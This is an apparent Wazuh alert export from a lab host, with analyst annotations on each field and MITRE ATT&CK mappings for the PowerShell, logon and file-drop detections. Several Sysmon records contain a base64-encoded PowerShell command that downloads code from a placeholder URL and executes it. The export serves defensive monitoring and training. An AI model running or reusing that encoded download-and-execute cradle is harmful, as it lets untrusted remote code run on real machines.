data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:09.068 ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} ProcessId: 10148 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} ParentProcessId: 10844 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:09.068
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd51-680a-690b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd4a-680a-660b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:12.570+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:12.570+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  69
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534292.1564313
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:10.6058844Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284311
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:10.562 ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} ProcessId: 10148 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fabyeuej.msp.ps1 CreationUtcTime: 2025-04-24 22:38:10.562 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:10.562
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd51-680a-690b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fabyeuej.msp.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:10.562
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:38:13.131+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:13.131+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  55
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534293.1567082
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:10.4754770Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43855
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:15.660+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:15.660+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  66
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534295.1574417
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:13.3701266Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284355
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:12.078 ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} ProcessId: 15472 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} ParentProcessId: 10148 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:12.078
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd54-680a-6c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15472
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd51-680a-690b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:16.338+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:16.338+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

